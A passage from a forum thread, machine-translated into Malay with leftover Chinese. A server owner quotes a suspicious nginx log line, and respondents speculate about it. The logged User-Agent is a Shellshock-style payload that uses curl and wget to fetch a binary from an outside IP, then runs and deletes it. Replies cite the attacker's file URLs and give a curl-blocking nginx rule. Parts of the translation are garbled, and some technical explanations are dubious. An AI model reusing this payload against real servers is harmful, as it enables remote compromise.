nginx - Soalan tentang menggunakan ejen pengguna untuk menyerang

Question

Hari ini saya secara tidak sengaja menemui log yang sangat pelik dalam access.log nginx pada pelayan syarikat:

61.136.82.154 - - [07/Jan/2017:02:27:26 +0000] "GET / HTTP/1.0" 200 3770 "-" "() { :;}; /bin/bash -c \x22curl -o /tmp/mig http://37.1.202.6/mig;/usr/bin/wget http://37.1.202.6/mig -O /tmp/mig;chmod +x /tmp/mig;/tmp/mig;rm -rf /tmp/mig*\x22" "-"

Apabila datang ke tempat pelik:

1. Menggunakan http1.0

2. ejen pengguna ialah skrip

Saya mencari di Internet dan tidak menemui maklumat tentang menggunakan ejen pengguna untuk menyerang Walaupun saya dapat mendapatkan kod skrip dengan mengikut alamat dalam log, keupayaan saya terhad dan saya tidak dapat menganalisis sasaran serangannya.

Maafkan saya, mana-mana pakar, adakah anda mempunyai maklumat dan pengalaman yang berkaitan? Tolong kongsikan dengan saya, terima kasih banyak! !

Ditambah:

Di bawah konfigurasi nginx apakah ia akan menghuraikan kandungan dalam ejen pengguna?

Answer 1

Ini sepatutnya menjadi kelemahan user-agent http1.0 pelayan anda mungkin disuntik dengan skrip oleh pihak lain dan ia menyamarkan apachecode> pada anda > perkhidmatan, menukar pelayan anda menjadi ayam dan memanipulasinya untuk menjalankan serangan DDOS, tetapi saya tidak tahu jika nginx akan melaksanakan skripnyahttp1.0的user-agent漏洞，你的服务器可能被对方注入脚本，他在你上面伪装了一个apache的服务，把你的服务器搞成了肉鸡，并操纵他进行DDOS攻击，但是我不知道nginx会不会执行它这个脚本

你可以看看你access.log中http://37.1.202.6/mig这个地址。可以看到有个a文件http://37.1.202.6/a

Anda boleh menyemak alamat http://37.1.202.6/mig dalam access.log anda. Anda boleh melihat bahawa terdapat fail http://37.1.202.6/a Anda boleh melihat kod ini. 🎜

Answer 2

Pengimbas disuntik. . . Ejen Pengguna akan dihuraikan.
1. Pasang firewall aplikasi
2

`

jika ($http_user_agent ~* 'curl') #Konfigurasikan ejen pengguna yang ditolak.
{
kembali 403;
}
`

Answer 3

Satu perenggan perl 脚本，作用就是 伪装成 Apache

Kemudian terima arahan untuk melakukan sesuatu. . . Betul, menangkap ayam daging.